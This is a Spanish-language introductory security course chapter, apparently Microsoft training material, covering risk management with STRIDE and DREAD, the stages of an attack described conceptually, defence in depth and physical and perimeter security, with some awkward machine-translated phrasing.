FUNDAMENTOS DE SEGURIDAD

1. Requisitos previos para el curso on-line

Experiencia práctica en la instalación, configuración, administración y planeamiento de la implementación de Windows 2000 o Windows Server 2003

Experiencia con Active Directory

2. Panorama actual

2.1.El delito informático está aumentando de frecuencia y de severidad:

Los meses recientes han considerado un claro aumento en ataques criminales contra los sistemas informáticos del mundo. La naturaleza del riesgo está cambiando rápidamente y está llegando a ser más y más seria. Los hackers criminales se están sofisticando y la proliferación de conexiones de banda ancha de alta velocidad — una cosa muy positiva en todos aspectos — crea un ambiente en el cual un virus o un gusano puede esparcirse increíblemente rápido y afectar a negocios y a consumidores más rápidamente y perceptiblemente que antes.

2.2.La tecnología existe para los sistemas de protección pero la clave está en la puesta en práctica:

Mientras que no hay software inmune a estos ataques criminales, las computadoras se pueden instalar y mantener de manera de reducir al mínimo el riesgo. Pero hasta la fecha ha sido demasiado difícil, complicado y desafiante administrar las herramientas existentes de seguridad, muchas de las cuales, cuando se implementan apropiadamente, son altamente eficaces en la prevención o la atenuación del impacto en la computadora atacada.

2.3.Microsoft está tratando el problema de complejidad hoy y en el futuro:

Reconocemos que Microsoft puede desempeñar un papel dominante en mejorar la seguridad de la computadora: necesitamos continuar invirtiendo y entregando un nivel más alto de seguridad, necesitamos simplificar la seguridad y conducir la inteligencia de las protecciones de seguridad más profundas en nuestro software para reducir las demandas en los usuarios y los administradores. Los clientes nos dicen que esperan que nosotros hagamos más y nosotros estamos escuchando y trabajando de maneras múltiples para innovar y tratar el problema.

Los clientes nos han dicho que quieren que las herramientas, las características y las configuraciones de seguridad sean más fáciles de poner en práctica y más simples de utilizar, y que las protecciones de seguridad sean intrínsecas al software.

Durante este curso, hablaremos de cómo Microsoft está respondiendo a estas demandas y al contorno de acciones que estamos llevando a cabo, integrando tecnologías de seguridad. Las acciones específicas incluirán:

Los procesos, las políticas y las tecnologías mejoradas de la administración de parches para ayudar a clientes a permanecer actualizados y seguros.

El otorgamiento de una dirección mejor y las herramientas para asegurar sistemas.

Actualizaciones a Microsoft Windows® XP y Windows Server 2003 con las nuevas tecnologías de seguridad ,que harán a Windows más resistente a los ataques, incluso si los parches todavía no existen ni se han instalado.

3. Definir Seguridad de Plataforma

Hay varias pautas, estándares y recomendaciones disponibles que pueden ayudar a simplificar la tarea de asegurar su empresa. Miremos algunos de éstos detalladamente.

IT Infrastructure Library (ITIL) Definition

El gerenciamiento de la seguridad es responsable de la confidencialidad, la integridad y la disponibilidad de datos asociados a un servicio. Un número de security issues tienen que ser cubiertos por la administración de disponibilidad:

- Los servicios deben estar disponibles sólo para el personal autorizado- Los datos deben estar disponibles solamente para el personal autorizado

y solamente en las horas convenidas- Los servicios deben ser recuperables dentro de los parámetros

convenidos de confidencialidad e integridad- Los servicios se deben diseñar y funcionar dentro de las políticas de

seguridad- Los contratistas deben tener acceso al hardware o al software

Nota: Para más información, ir a http://www.itil.org/itil_e/itil_e_080.html

ISO 17799 (British Standard 7799)

De http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter

“La información es la sangre de todas las organizaciones y puede existir en muchas formas. Puede ser impresa o escrita en papel, almacenada electrónicamente, transmitida por correo electrónico, mostrada en películas o hablada en una conversación. En el ambiente de negocio competitivo de hoy, tal información está constantemente bajo amenaza de muchas fuentes. Éstas pueden ser internas, externas, accidentales o maliciosas. Con el uso creciente de la nueva tecnología, al almacenar, transmitir y recuperar la información, hemos abierto un gran número y tipo creciente de amenazas”.

“Hay una necesidad de establecer una política comprensiva de seguridad de la información dentro de todas las organizaciones. Usted necesita asegurar la confidencialidad, integridad y disponibilidad de la información corporativa vital y de la información del cliente. El estándar para Information Security Management System (ISMS) BS 7799, ya ha sido rápidamente establecido por los vendedores de software más grandes del mundo”.

ISO 17799 (British Standard 7799) proporciona un acercamiento sistemático para administrar la información corporativa sensible. Proporciona los requisitos para Information Security Management System. Security Management System es un código de práctica que incluye gente, procesos, y sistemas. ISO 17799 abarca de las diez secciones. Como ISO 17799 es un estándar, se recomienda que éste sea repasado para el detalle en cada una de las 10 clasificaciones de seguridad.

Nota: Para más información, ir a: http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter

Microsoft Operations Framework

Cap1-34.jpg

Microsoft Operations Framework (MOF) proporciona la dirección técnica y la ayuda de consulta que permite a organizaciones alcanzar confiabilidad, disponibilidad, soportabilidad y flexibilidad en sistemas de misión critica de los productos y tecnologías Microsoft.

MOF proporciona la dirección operacional en forma de white papers, guías de operaciones, herramientas, las mejores prácticas, casos de estudio, plantillas, herramientas de soporte y servicios. Estas guías están dirigidas a gente, procesos, tecnología y administración de issues complejos, ambientes IT heterogéneos y distribuidos.

4. Indice del presente capítulo

Caso práctico Disciplina de administración de riesgos de seguridad Defensa en profundidad Respuesta a incidentes de seguridad Ejemplos de ataques Recomendaciones Diez normas de seguridad inmutables

5. Caso práctico

Aquí se establecerá el fundamento empresarial de la seguridad. Específicamente, se tratará:

Las consecuencias de las infracciones de seguridad. La encuesta de CSI/FBI de 2003.

5.1.Repercusión de las infracciones de seguridad

Cap1-01.jpg

Las infracciones de seguridad afectan a las organizaciones de diversas formas. Con frecuencia, tienen los resultados siguientes:

Pérdida de beneficios Perjuicio de la reputación de la organización Pérdida o compromiso de la seguridad de los datos Interrupción de los procesos empresariales Deterioro de la confianza del cliente Deterioro de la confianza del inversor Consecuencias legales: en muchos estados o países, la incapacidad de

proteger un sistema tiene consecuencias legales; un ejemplo es Sarbanes Oxley, HIPAA, GLBA, California SB 1386.

- Las infracciones de seguridad tienen efectos de gran repercusión. Cuando existe una debilidad en la seguridad, ya sea real o sólo una percepción, la organización debe emprender acciones inmediatas para garantizar su eliminación y que los daños queden restringidos.

- Muchas organizaciones tienen ahora servicios expuestos a los clientes, como los sitios Web. Los clientes pueden ser los primeros en observar el resultado de un ataque. Por lo tanto, es esencial que la parte de una compañía que se expone al cliente sea lo más segura posible.

5.2.Encuesta de CSI/FBI de 2003

Cap1-02.jpg

El costo de la implementación de medidas de seguridad no es trivial; sin embargo, sólo es una fracción del costo que supone mitigar un incidente de seguridad.

La encuesta más reciente sobre seguridad y delitos informáticos del Instituto de seguridad de equipos y de la Oficina Federal de Investigación (CSI/FBI, Computer Security Institute/Federal Bureau of Investigation) de Estados Unidos, incluye cifras interesantes relativas a las pérdidas financieras que suponen los ataques a equipos para las organizaciones que los sufren.

La encuesta demuestra que los ataques de denegación de servicio (DoS, Denial Of Service) y de robo de información son los responsables de las mayores pérdidas.

En consecuencia, es importante saber que aunque el costo de la implementación de sistemas de protección de la seguridad no es trivial,

supone una fracción del costo que conlleva mitigar los compromisos de la seguridad.

La solución de seguridad más efectiva es la creación de un entorno en niveles de modo que se pueda aislar un posible ataque llevado a cabo en uno de ellos. Un ataque tendría que poner en peligro varios niveles para lograr su propósito. Esto se conoce como defensa en profundidad. Esta estructura de seguridad se explicará detalladamente más adelante en esta presentación.

6. Disciplina de administración de riesgos de seguridad

En este capítulo, se explicará la disciplina de administración de riesgos de seguridad (SRMD). Específicamente, se tratará:

Los tres procesos de SRMD son: Evaluación. Desarrollo e implementación. Funcionamiento.

La evaluación implica: Evaluación y valoración de activos. Identificación de riesgos de seguridad con STRIDE. Análisis y asignación de prioridad a los riesgos de seguridad con DREAD. Seguimiento, planeamiento y programación de actividades relacionadas

con los riesgos de seguridad.

El desarrollo e implementación incluyen: Desarrollo de métodos correctivos de seguridad. Prueba de los métodos correctivos de seguridad. Obtención de información de seguridad.

El funcionamiento incluye Volver a valorar los activos nuevos y los que han sufrido cambios, así

como los riesgos de seguridad. Estabilizar e implementar medidas preventivas nuevas o que han

cambiado.

6.1.Procesos

Cap1-03.jpg

La disciplina de administración de riesgos de seguridad (SRMD, Security Risk Management Discipline) define los tres procesos principales que una organización debe implementar para llegar a ser segura y continuar siéndolo. Los tres procesos son:

• Evaluación: esta fase implica la recopilación de la información relevante del entorno de la organización con el fin de realizar una estimación de la seguridad. Debe recopilar datos suficientes para analizar de forma efectiva el estado actual del entorno. A continuación, se debe determinar si los activos de información de la organización están bien protegidos de posibles amenazas, y se debe crear un plan de acción de seguridad, que se pone en práctica durante el proceso de implementación.

• Desarrollo e implementación: esta fase se centra en la puesta en marcha de un plan de acción de seguridad destinado a implementar los cambios recomendados definidos en la fase de evaluación. Además, se desarrolla un plan de contingencia de riesgos de seguridad.

• Funcionamiento: durante esta fase, se debe modificar y realizar actualizaciones en el entorno a medida que se necesiten para mantener su seguridad. Durante los procesos operativos, se llevan a cabo estrategias de pruebas de la penetración y de respuesta a incidentes, que ayudan a solidificar los objetivos de la implementación de un proyecto de seguridad en la organización. Asimismo, también se realizan actividades

de auditoría y supervisión para mantener la infraestructura intacta y segura.

En la guía de Microsoft Solutions para la protección de Windows 2000 Server (Microsoft Solutions Guide for Securing Windows 2000 Server) en www.microsoft.com, se encuentran detalles adicionales de SRMD.

7. Evaluación: evaluar y valorar

Cap1-04.jpg

La evaluación de activos determina el valor reconocido de la información desde el punto de vista de quienes la utilizan y el trabajo que conlleva su desarrollo. La evaluación de activos también implica determinar el valor de un servicio de red, por ejemplo, el de un servicio que proporciona a los usuarios de la red acceso saliente a Internet, desde el punto de vista de quienes utilizan dicho servicio y lo que costaría volver a crearlo.

La valoración determina cuánto cuesta mantener un activo, lo que costaría si se perdiera o destruyera y qué beneficio lograrían terceros si obtuvieran esta información. El valor de un activo debe reflejar todos los costos identificables que surgirían si el activo se viera perjudicado.

Al determinar las prioridades en relación a los activos, se pueden emplear valores arbitrarios, como los mostrados en la diapositiva, o valores específicos, como el costo monetario real. Las organizaciones deben utilizar la escala más apropiada para resaltar el valor relativo de sus activos.

7.1.

Cap1-05.jpg

La identificación de los riesgos de seguridad permite a los miembros de los grupos de trabajo del proyecto aclarar las ideas e identificar posibles riesgos para la seguridad. La información se recopila en forma de amenazas, vulnerabilidades, puntos débiles y medidas preventivas. El modelo STRIDE proporciona una estructura valiosa y fácil de recordar para identificar las amenazas y los posibles puntos débiles.

La suplantación de identidades es la capacidad de obtener y usar la información de autenticación de otro usuario. Un ejemplo de suplantación de identidad es la utilización del nombre y la contraseña de otro usuario.

La alteración de datos implica su modificación. Un ejemplo sería alterar el contenido del cookie de un cliente.

El repudio es la capacidad de negar que algo ha ocurrido. Un ejemplo de repudio sería que un usuario cargue datos dañinos en el sistema cuando en éste no se puede realizar un seguimiento de la operación.

La divulgación de información implica la exposición de información ante usuarios que se supone que no deben disponer de ella. Un ejemplo de

divulgación de información es la capacidad de un intruso para leer archivos médicos confidenciales a los que no se le ha otorgado acceso.

Los ataques de denegación de servicio privan a los usuarios del servicio normal. Un ejemplo de denegación de servicio consistiría en dejar un sitio Web inaccesible al inundarlo con una cantidad masiva de solicitudes HTTP.

La elevación de privilegios es el proceso que siguen los intrusos para realizar una función que no tienen derecho a efectuar. Para ello, puede explotarse una debilidad del software o usar las credenciales de forma ilegítima.

Otros ataques podrían ser llevados a cabo únicamente con el propósito de que el sistema de destino incurra en gastos. Por ejemplo, se podría montar un ataque contra un servicio de fax o un teléfono celular para hacer un gran número de llamadas internacionales que supongan un gran costo.

7.2.Amenazas comunes

7.2.1. ¿Quién puede atacar?

Cap1-28.jpg

Los atacantes de todas las capacidades y motivaciones son peligrosos a la seguridad de la red interna, de diversas maneras:

Principiante. La mayoría de los atacantes tienen solamente conocimiento básico de sistemas pero son inmóviles y peligrosos porque no entienden a menudo completamente las consecuencias de sus acciones.

Intermedio. Los atacantes con habilidades intermedias generalmente están intentando ganar respeto en comunidades de atacantes. Típicamente, atacan blancos prominentes y crean herramientas automatizadas para atacar otras redes.

Avanzado. Los atacantes altamente expertos presentan un desafío serio a la seguridad porque sus métodos de ataque se pueden extender más allá de la tecnología en intrusión física e ingeniería social, o engaño de un usuario o administrador para ganar la información. Aunque hay relativamente pocos atacantes avanzados, sus habilidades y la experiencia los hacen los atacantes más peligrosos a una red.

7.2.2. Vulnerabilidades

Cap1-29.jpg

Los ataques más acertados contra redes tienen éxito explotando el campo común y las vulnerabilidades o debilidades sabidas. Asegúrese de entrenar a

administradores y reconocer estas vulnerabilidades para que lleguen a ser familiares con nuevas vulnerabilidades cuando ellas se descubran.

7.2.3. ¿Cómo ocurren los ataques?

Cap1-30.jpg

Los ataques contra redes siguen a menudo el mismo patrón. Métodos de diseño para detectar, responder o prevenir ataques durante cada una de las siguientes etapas:

1. Ingreso. En esta etapa, el atacante investiga a la organización blanco. Él puede obtener toda la información pública sobre una organización y sus

empleados y realizar exploraciones completas en todas las computadoras y dispositivos que son accesibles desde Internet.2. Penetración. Después de que el atacante haya localizado vulnerabilidades potenciales, intenta aprovecharse de una de ellas. Por ejemplo, el atacante explota un Servidor Web que carece de la actualización última de seguridad.3. Elevación del privilegio. Luego que el atacante ha penetrado con éxito la red, procura obtener los derechos a nivel sistema de Administrador. Por ejemplo, mientras que explota el servidor Web, gana control de un proceso funcionando bajo el contexto LocalSystem. Este proceso será utilizado para crear una cuenta administrador. En general, seguridad pobre como resultado de usar las configuraciones por defecto, permite que un atacante obtenga el acceso de red sin mucho esfuerzo.4. Explotar. Después de que el atacante haya obtenido las derechas necesarias, él realiza la hazaña o método de romper la red. Por ejemplo, el atacante elige desfigurar el sitio público Web de la organización.5. Cover-up. La etapa final de un ataque es donde un atacante procura ocultar sus acciones para escapar a la detección o el procesamiento. Por ejemplo, un atacante borra entradas relevantes en archivos log de la intervención.

7.3.Evaluación: análisis y establecimiento de prioridades de los riesgos de seguridad: DREAD

DREAD• Daño• Capacidad de reproducción• Capacidad de explotación• Usuarios afectados• Capacidad de descubrimiento

Exposición al riesgo = Prioridad del activo x Categoría de la amenaza

• El análisis de riesgos de seguridad se utiliza para analizar los ataques, herramientas, métodos y técnicas que podrían usarse para explotar una posible vulnerabilidad. El análisis de riesgos de seguridad es un método para la identificación de riesgos y la evaluación del posible daño que podría ocasionarse. El resultado de la evaluación puede usarse para justificar medidas de protección de la seguridad.

• Un análisis de riesgos de seguridad tiene tres objetivos principales: identificar riesgos, cuantificar los efectos de las posibles amenazas y proporcionar un equilibrio económico entre la repercusión del riesgo y el costo de la medida preventiva. La información se recopila para estimar el grado de riesgo de modo que el grupo de trabajo pueda tomar decisiones fundadas en relación a qué riesgos de seguridad deben constituir el objeto principal de las estrategias correctivas.

Este análisis se usa entonces para asignar prioridad a los riesgos de seguridad y permitir a la organización destinar los recursos para tratar los problemas de seguridad más importantes.

• Una vez identificada una amenaza, debe clasificarse. Una solución para ello es usar DREAD. La clasificación de 1 a 10 se asigna en cinco áreas: daños, capacidad de reproducción, capacidad de explotación, usuarios afectados y capacidad de descubrimiento.

• La clasificación se realiza como promedio, con lo que ofrece una categoría global de amenazas. Cuanto mayor es la categoría, más grave es la amenaza. Esta clasificación proporciona una perspectiva de la prioridad relativa de cada riesgo en vez de una cuantificación real del mismo. Para ello se pede tomar esta categoría y multiplicarla por el grado de imprescindibilidad de un sistema para conocer el riesgo que supone para éste.

7.4.Elementos a proteger

Cap1-31.jpg

Además de la protección física enumerada en la tabla, gran parte del papel de la seguridad es proteger la confianza pública y la confianza en socios de negocio. En las prácticas generalmente aceptadas de la contabilidad (GAAP), este tipo de activo se conoce como voluntad, que se puede poner en estados financieros cuando venden a una compañía.

Considerar, por ejemplo, que un atacante atacó el sitio Web de su organización. Usted notifica a sus clientes que el atacante ha robado la información privada de

Usuarios del sitio Web, incluyendo sus direcciones y números de tarjeta de crédito. Además de incurrir en pérdidas financieras directas del negocio, su organización también sufre una pérdida de confianza porque se desdibuja la imagen de la compañía.

7.5.

Cap1-06.jpg

Las tareas de seguimiento, planeamiento y programación de riesgos de seguridad toman la información obtenida en el análisis de riesgos de seguridad y se utilizan para formular estrategias correctivas y de contingencia, además de los planes para abarcarlas.

La programación de riesgos de seguridad intenta definir un programa para las diversas estrategias correctivas, creadas durante la fase de generación de un proyecto de seguridad. Esta programación tiene en consideración la forma en que los planes de seguridad se aprueban e incorporan a la arquitectura de información, además de los procedimientos de operaciones diarias estándares que deben implementarse.

8.

Cap1-07.jpg

El desarrollo de métodos correctivos para los riesgos de seguridad es un proceso en el que se toman los planes creados durante la fase de evaluación y se usan para elaborar una nueva estrategia de seguridad que implique la administración de la configuración y las revisiones, la supervisión y auditoría de los sistemas, y la creación de directivas y procedimientos operativos.

A medida que se desarrollan las diversas medidas preventivas, es importante garantizar que se realice un seguimiento e informe minuciosos del progreso.

La prueba de las estrategias correctivas de los riesgos de seguridad tienen lugar después de su desarrollo, una vez realizados los cambios de administración del sistema asociados y escrito las directivas y procedimientos para determinar su efectividad.

El proceso de prueba permite al grupo de trabajo considerar cómo se pueden implementar dichos cambios en un entorno de producción. Durante el proceso de prueba, las medidas preventivas se evalúan teniendo en cuenta la efectividad con respecto a cómo se consigue controlar el riesgo de seguridad y a los efectos indeseables que se observan en otras aplicaciones.

8.1.Obtención

Cap1-08.jpg

El conocimiento de los riesgos de seguridad permite formalizar el proceso para recopilar la información sobre cómo el grupo de trabajo protegió los activos y documenta las vulnerabilidades y puntos débiles que se descubrieron. Cuando el departamento de tecnología de la información (IT, Information Technology) reúne nueva información relativa a la seguridad, dicha información se debe capturar y volver a implementar para garantizar la máxima eficacia, continuada de las medidas preventivas de seguridad que protegen los activos de la organización. Además, se debe implantar un programa de aprendizaje destinado a los grupos empresariales. Este programa de aprendizaje puede tomar la forma de cursos instructivos o de boletines diseñados para adquirir conciencia de la seguridad.

Una organización debe definir un proceso formal de administración de riesgos que determinará cómo se inician y evalúan las medidas preventivas, y en qué circunstancias se debe avanzar de un paso a otro en cada riesgo de seguridad o conjunto de riesgos.

8.2.Funcionamiento: reevaluación de los activos y los riesgos

Cap1-09.jpg

Las organizaciones son dinámicas y su plan de seguridad también debe serlo. Se debe actualizar la evaluación de riesgos periódicamente. Asimismo, valorar el plan de evaluación de riesgos cada vez que se realice un cambio importante en el funcionamiento o en la estructura. Es decir, si se efectúa una reorganización o se traslada a un edificio nuevo o se cambia de proveedores o se activa un nuevo sitio Web o se realizan otros cambios importantes, se deben volver a evaluar los riegos y las posibles pérdidas mediante los pasos descritos anteriormente en la fase de evaluación.

Es importante evaluar los riesgos de forma continuada. Esto significa que nunca se debe dejar de buscar nuevos riesgos ni de reevaluar periódicamente los riesgos existentes. Si no se realiza alguna de estas acciones, la administración de riesgos no beneficiará a la organización. La frecuencia con que se debe revisar el plan de administración de riesgos y sus activadores debe definirse en la directiva de seguridad de la organización.

La reevaluación de activos y riesgos es esencialmente un proceso de administración de cambios, pero también se utiliza para realizar la administración de la configuración de seguridad. Esto permite reducir el trabajo administrativo cuando se han completado las medidas preventivas y las directivas de seguridad.

8.3.Funcionamiento: estabilización y desarrollo de medidas preventivas

Cap1-10.jpg

En general, la Disciplina de Administración de Riesgos de Seguridad se basa en los siguientes componentes de la guía de ciclo de vida de tecnología de la información de Microsoft:

Disciplina de administración de riesgos de Microsoft Solutions Framework (MSF) http://www.microsoft.com/technet/itsolutions/techguide/msf/msrmd11.mspx (este sitio está en inglés)

Modelo de riesgo para operaciones de Microsoft Operations Framework (MOF) http://www.microsoft.com/technet/itsolutions/techguide/mof/mofrisk.mspx (este sitio está en inglés)

La diapositiva muestra el modelo de riesgo para operaciones de MOF, que describe los pasos del proceso de administración de riesgos: identificar, analizar, planear, rastrear y controlar. Se trata de un proceso continuado que implica la evaluación y el análisis continuados de los riesgos de seguridad. En consecuencia, será necesario implementar continuamente nuevas medidas preventivas o realizar cambios en las existentes, basándose en esta nueva evaluación.

Después de la implementación de las medidas preventivas nuevas o que han cambiado, es importante mantener el proceso de las operaciones. Las tareas que los administradores de seguridad o los administradores de redes tienen que realizar pueden incluir:

Administración del sistema Mantenimiento de cuentas Supervisión de servicios Programación de trabajos Procedimientos de copia de seguridad

Estos procesos de implementación de la estabilización y las medidas preventivas corresponden a las fases de estabilización y desarrollo del modelo de proceso MSF, que pueden encontrarse enhttp://www.microsoft.com/technet/itsolutions/techguide/msf/msfpm31.mspx(este sitio está en inglés).

9. Defensa en profundidad

En este tema, se expondrá la defensa en profundidad. Específicamente, se tratará:

Organización de una estructura para la seguridad: defensa en profundidad. Cómo se puede ver comprometida la seguridad de cada nivel del modelo de

defensa en profundidad. Cómo proporcionar protección para cada nivel del modelo de defensa en

profundidad.

Para reducir riesgo en un ambiente, se debe utilizar una estrategia de la defensa-en-profundidad para proteger recursos contra amenazas externas e internas. Defensa en profundidad (llamado a veces seguridad en profundidad o

seguridad de varias capas) se toma de un término militar usado para describir las contramedidas de la seguridad para formar un ambiente cohesivo de seguridad sin un solo punto de falla. Las capas de la seguridad que forman la estrategia de defensa-en-profundidad deben incluir medidas protectoras que implementen desde sus routers externos completamente a la localización de los recursos y a todos los puntos entre ellos.

Por capas múltiples se implementa seguridad, y se debe ayudar a asegurar una capa si se compromete la misma, Las otras capas proporcionarán la seguridad necesaria para proteger los recursos. Por ejemplo, el compromiso del firewall de una organización no debe proporcionar acceso del atacante a los datos más sensibles de la organización. Cada capa debe proporcionar idealmente diversas formas de contramedidas para evitar que el mismo método de ataque sea utilizado en las diferentes capas.

Se debe invertir en una protección multi-vendor contra virus si es posible. También es necesario asegurarse de que la protección de virus esté configurada en diversos puntos como gateway, server, clientes etcétera.

9.1.Estructura de organización de la seguridad

Cap1-11.jpg

Para reducir al mínimo la posibilidad de que un ataque contra una organización tenga éxito, se debe utilizar el mayor número posible de niveles de defensa.

Defender una organización en profundidad implica el uso de varios niveles de defensa. Si un nivel se ve comprometido, ello no conlleva necesariamente que también lo esté toda la organización. Como directriz general, se debe diseñar y crear cada nivel de la seguridad bajo el supuesto de que se ha conseguido infringir la seguridad. Realizar los pasos necesarios para proteger el nivel en el que se esté trabajando.

Además, hay muchas formas de proteger cada nivel individual mediante herramientas, tecnologías, directivas y la aplicación de las recomendaciones. Por ejemplo:

• Nivel de directivas, procedimientos y concienciación: programas educativos de seguridad para los usuarios

• Nivel de seguridad física: guardias de seguridad, bloqueos y dispositivos de seguimiento

• Nivel perimetral: servidores de seguridad de hardware, software o ambos, y creación de redes privadas virtuales con procedimientos de cuarentena

• Nivel de red de Internet: segmentación de red, Seguridad IP (IPSec) y sistemas de detección de intrusos de red

• Nivel de host: prácticas destinadas a reforzar los servidores y clientes, herramientas de administración de revisiones, métodos seguros de autenticación y sistemas de detección de intrusos basados en hosts.

• Nivel de aplicación: prácticas destinadas a reforzar las aplicaciones y el software antivirus

• Nivel de datos: listas de control de acceso (ACL) y cifrado

9.2.Descripción de las directivas, los procedimientos y el nivel de concienciación

Cap1-12.jpg

Generalmente, los usuarios no tienen en cuenta la seguridad cuando realizan sus tareas diarias.

Una directiva de seguridad para una organización debe definir:• El uso aceptable.• El acceso remoto.• La protección de la información.• La copia de seguridad de los datos.• La seguridad del perímetro.• La seguridad de los dispositivos y hosts básicos.

Una directiva debe comunicar consenso y proporcionar el fundamento para que el departamento de Recursos Humanos actúe en el caso de que se infrinja la seguridad. También puede ayudar a demandar a quienes logren infringir la seguridad.

Una directiva de seguridad debe proporcionar a la organización un procedimiento de tratamiento de incidentes apropiado. Debe definir:• Las áreas de responsabilidad.• El tipo de información que debe registrarse.• El destino de esa información.• Qué acciones emprender tras un incidente.

Una directiva de seguridad adecuada suele ser el fundamento del resto de prácticas de seguridad. Cada directiva debe ser lo suficientemente general para poder aplicarse en distintas tecnologías y plataformas. Al mismo tiempo, debe ser lo suficientemente específica para proporcionar a los profesionales de IT orientación sobre cómo implementar la directiva.

El ámbito de la directiva de seguridad de una organización depende del tamaño y complejidad de ésta. En muchas organizaciones hay consejos disponibles sobre cómo crear directivas de seguridad, por ejemplo, en http://www.sans.org/ y http://www.iss.net/ (estos sitios están en inglés).

9.3.Directivas, procedimientos y compromiso del nivel de concienciación

Los intrusos pueden usar estratagemas sociales para aprovecharse de los usuarios que no son conscientes de los problemas de seguridad que pueden surgir en su lugar de trabajo o que los desconocen. Para los usuarios, muchas medidas de seguridad parecen innecesarias y, por lo tanto, no las siguen.

Muchos ataques implican el uso de estratagemas sociales. Ciertos artificios sociales se aprovechan de la despreocupación por la seguridad con que la mayor parte de los usuarios actúan en su vida diaria. Un intruso puede emplear su tiempo de ocio o de trabajo en intentar conocer a los usuarios y ganarse su confianza. Aunque un intruso formule preguntas aparentemente inofensivas, la información que obtiene en conjunto le proporciona los medios para llevar a cabo o iniciar un ataque.

9.4.Directivas, procedimientos y protección del nivel de concienciación

Para contrarrestar estas amenazas de estratagemas sociales, las organizaciones deben implementar procedimientos claros y precisos, y procesos que deban cumplir todos los empleados, además de entrenarlos en el uso de estas directivas. Cada función que se desempeñe debe tener instrucciones claras y documentadas.

Siempre se requieren programas de aprendizaje sobre seguridad para detallar estos procesos y procedimientos. Las instrucciones deben formar una imagen completa de la seguridad de modo que los usuarios entiendan la necesidad de disponer de seguridad en todos los niveles y en todas las ocasiones.

Una directiva de seguridad combina las necesidades de seguridad y la cultura de una organización. Se ve afectada por el tamaño de la organización y sus objetivos. Algunas directivas pueden ser aplicables a todos los sitios pero otras son específicas de ciertos entornos. Una

directiva de seguridad debe equilibrar la posibilidad de control con la necesidad de productividad. Si las directivas son demasiado restrictivas, los usuarios siempre encontrarán formas de omitir los controles. Una organización debe demostrar un compromiso en la administración con respecto al grado de control definido en una directiva; de lo contrario, no se implementará correctamente.

9.5.Descripción del nivel de seguridad física

Cap1-13.jpg

Un intruso con acceso a los componentes físicos puede omitir fácilmente muchos procedimientos de seguridad.

Un intruso puede utilizar el teléfono de una compañía o un dispositivo de mano. Acciones como ver las listas de contactos o números de teléfono, enviar un mensaje de correo electrónico o responder al teléfono identificándose como su propietario, pueden facilitar al intruso la consecución de su objetivo.

Los equipos portátiles de una compañía pueden contener abundante información muy útil para un intruso. Es por ello que siempre deben almacenarse de un modo seguro cuando no se estén usando.

9.6.Compromiso del nivel de seguridad física

Cap1-14.jpg

Si los intrusos obtienen acceso físico a los sistemas, pasan a convertirse en efecto en sus propietarios.

En algunos casos, un ataque sólo es un acto vandálico. Deshabilitar un sistema puede constituir un problema importante, pero no es menos serio que el hecho de que un intruso pueda ver, cambiar o eliminar datos que se piensa que son seguros.

El acceso físico a un sistema también permite a un intruso instalar software. El software puede pasar desapercibido y ejecutarse en un sistema durante un período considerable, durante el que consigue recopilar datos esenciales de la compañía. Esto puede resultar desastroso.

9.7.Protección en el nivel de seguridad física

Se puede utilizar una amplia variedad de técnicas para proteger una instalación. El grado de seguridad física disponible depende del presupuesto. Es fácil mantener estándares elevados cuando se trabaja con un modelo hipotético. Sin embargo, en el mundo real, las soluciones deben idearse en función del sitio, los edificios y las medidas de seguridad empleadas. La lista de la diapositiva presenta algunas de las maneras en que puede proteger una instalación.

La defensa en profundidad comienza por aplicar una seguridad física a todos los componentes de la infraestructura. Si algún individuo no autorizado tiene acceso físico al entorno, éste no se puede considerar seguro. Por ejemplo, un técnico de mantenimiento podría cambiar un disco con errores en una matriz RAID1 que contenga datos de clientes. Es posible que el disco se pueda reparar. Los datos están ahora en manos de un tercero.

El primer paso es separar los servidores de los operadores humanos y los usuarios. Todas las salas de servidores deben estar cerradas con llave. El acceso a las salas de servidores debe estar controlado y registrado estrictamente. Algunos de los mecanismos de control de acceso que pueden aplicarse incluyen el uso de placas de identificación y sistemas biométricos. Un empleado de confianza debe organizar de antemano el acceso y autorizarlo. Si no existen salas especiales para los servidores, éstos se deben proteger en cabinas o, al menos, cerrarse bajo llave en los armarios. La mayor parte de los armarios de servidores se puede abrir con una llave estándar de modo que no debe confiar únicamente en las cerraduras que vengan de fábrica.

Todas las salas de servidores deben disponer de algún tipo de mecanismo contra incendios: los incendios provocados constituyen una amenaza que requiere una medida preventiva.

El acceso debe ser supervisado por guardias de seguridad o mediante un circuito cerrado de televisión (CCTV). Las grabaciones de vídeo de CCTV se pueden usar con fines de auditoría y la presencia de cámaras puede servir para prevenir accesos oportunistas. Tenga en cuenta que en la mayor parte de las ocasiones, quienes consiguen infringir la seguridad son individuos que curiosean sin malas intenciones, no piratas informáticos especializados que persiguen un fin dañino.

El acceso físico se extiende a las consolas de administración remotas, además de a los servidores. No tiene sentido proteger directamente el acceso a los monitores y los teclados si los servicios de terminal pueden tener acceso a los servidores desde cualquier lugar de la red interna. Esta directriz se aplica a las soluciones de monitor de vídeo de teclado (KVM,

Keyboard Video Monitor) IP y también al hardware de administración remota.

Igualmente, es importante limitar las oportunidades que puedan facilitar que los usuarios, con buenas intenciones o no, infecten o pongan en peligro un sistema. Quitar los dispositivos de entrada de datos como las unidades de disquete y de CD-ROM de los sistemas que no los requieran.

Por último, compruebar que todo el hardware de red está físicamente protegido. Si los servidores están protegidos en una sala o armario con cerradura, los enrutadores y conmutadores adjuntos también deben estar protegidos físicamente. De lo contrario, un intruso puede llegar fácilmente hasta un equipo portátil o de escritorio, y atacar a los servidores desde dentro del perímetro. Una vez más, se debe controlar la administración de los dispositivos de red; de lo contrario, pueden utilizarse para perpetrar un ataque contra el resto de la infraestructura.

9.8.Descripción del nivel perimetral

Cap1-15.jpg

El perímetro de red es el área de una red que está más expuesta a un ataque del exterior. Los perímetros de red se pueden conectar a numerosos entornos diferentes, que van desde socios comerciales a Internet. Cada organización usa

criterios distintos para definir su perímetro. Los criterios pueden incluir algunas o todas las conexiones descritas en la diapositiva.

9.9.Compromiso de la seguridad del nivel de perímetro

Cap1-16.jpg

La mayoría de los expertos en seguridad se centran en el área desde la que cabe esperar que se origine un ataque, como Internet. Sin embargo, los intrusos también son conscientes de que ésta será la solución que probablemente utilice e intentarán atacar la red desde algún otro lugar. Es muy importante que todas las entradas y salidas de la red sean seguras.

